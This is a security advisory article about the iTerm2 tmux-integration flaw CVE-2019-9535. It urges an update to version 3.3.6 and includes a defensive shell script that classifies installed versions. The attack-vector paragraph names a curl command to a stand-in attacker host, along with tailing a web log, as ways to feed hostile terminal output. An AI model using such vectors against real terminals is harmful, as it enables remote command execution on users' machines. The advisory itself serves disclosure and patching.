Cybersecurity analysts have discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.
After finding the vulnerability, researchers reported it to iTerm2’s developer so that a patch could be developed.
iTerm2 is one of the most popular terminal emulators in the world and is frequently used by developers. It was selected for a security audit because it processes untrusted data and is widely used, including by high-risk targets such as developers and system administrators at large companies all over the world.
During the audit, cybersecurity researchers identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years.
This means that an attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.
Example of a cybersecurity attack:
In this case, the attack vectors for this terminal emulator include connecting to a hacker-controlled SSH server or running commands like curl http://hacker.owned.domain.com and tail -f /var/log/apache2/referer_log. These are just some of the many commands that can expose the flaw and ultimately affect your macOS system.
In a proof-of-concept document, researchers documented many ways of getting a command to run on a mock victim’s machine after it connected to a malicious SSH server. In this case, only a calculator was opened, as a placeholder for other, more nefarious commands.
Typically this vulnerability would require some degree of user interaction or trickery, but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact.
Experts’ cybersecurity recommendation:
All users of iTerm2 should update immediately to the latest version (3.3.6), which has already been published.
An update to iTerm2 is now available with mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6.
Be aware that a prior update (3.3.5) was published earlier this week and does not contain the fix, meaning that a Mac running it is still vulnerable. Check that you are actually running the latest version.
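One way to check which side of the fix a machine is on, as an added example (not code from the original article or the iTerm2 project). It assumes the default install location /Applications/iTerm.app and the macOS defaults tool, and it compares version components numerically so that 3.3.5 is flagged while a later 3.3.10 is not:

```shell
#!/bin/sh
# Added example: classify an iTerm2 version against the fixed release.
FIXED_VERSION="3.3.6"   # from the article: first release with the CVE-2019-9535 mitigation

# version_ge A B: succeed if dotted numeric version A >= B.
# Components are compared as integers, so 3.3.10 > 3.3.6 (a string compare gets this wrong).
version_ge() {
    v1=$1 v2=$2
    while [ -n "$v1" ] || [ -n "$v2" ]; do
        c1=${v1%%.*}; c2=${v2%%.*}
        c1=${c1:-0}; c2=${c2:-0}          # missing component counts as 0 (3.4 == 3.4.0)
        if [ "$c1" -gt "$c2" ]; then return 0; fi
        if [ "$c1" -lt "$c2" ]; then return 1; fi
        case $v1 in *.*) v1=${v1#*.} ;; *) v1= ;; esac
        case $v2 in *.*) v2=${v2#*.} ;; *) v2= ;; esac
    done
    return 0
}

# iterm2_status VERSION: print "patched", "vulnerable" or "unknown".
# Anything that is not purely digits and dots (e.g. a beta tag) is reported
# as unknown so it gets checked by hand instead of being guessed.
iterm2_status() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) echo unknown; return 0 ;;
    esac
    if version_ge "$1" "$FIXED_VERSION"; then echo patched; else echo vulnerable; fi
}

# installed_iterm2_version [APP_PATH]: read the version from the app bundle (macOS only).
installed_iterm2_version() {
    app=${1:-/Applications/iTerm.app}     # assumption: default install location
    defaults read "$app/Contents/Info" CFBundleShortVersionString 2>/dev/null
}

# Run with --check on a Mac to audit the local install.
if [ "${1:-}" = "--check" ]; then
    v=$(installed_iterm2_version) || { echo "iTerm2 not found"; exit 2; }
    echo "iTerm2 $v: $(iterm2_status "$v")"
fi
```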
Besides this, make sure that you regularly check for system updates and other app updates. Remember that an outdated app can quickly become an open door for hackers.